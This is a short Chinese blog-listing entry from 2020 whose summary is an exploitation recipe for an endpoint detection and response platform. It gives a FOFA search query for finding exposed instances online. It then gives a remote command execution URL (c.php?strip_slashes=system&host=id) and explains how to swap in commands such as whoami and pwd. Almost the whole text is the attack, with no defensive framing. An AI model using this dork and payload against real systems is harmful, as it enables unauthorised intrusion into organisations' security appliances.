去B站咯
摘要: 先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当 阅读全文
posted @ 2020-09-30 14:53 不想长大a 阅读(358) 评论(0) 推荐(0) 编辑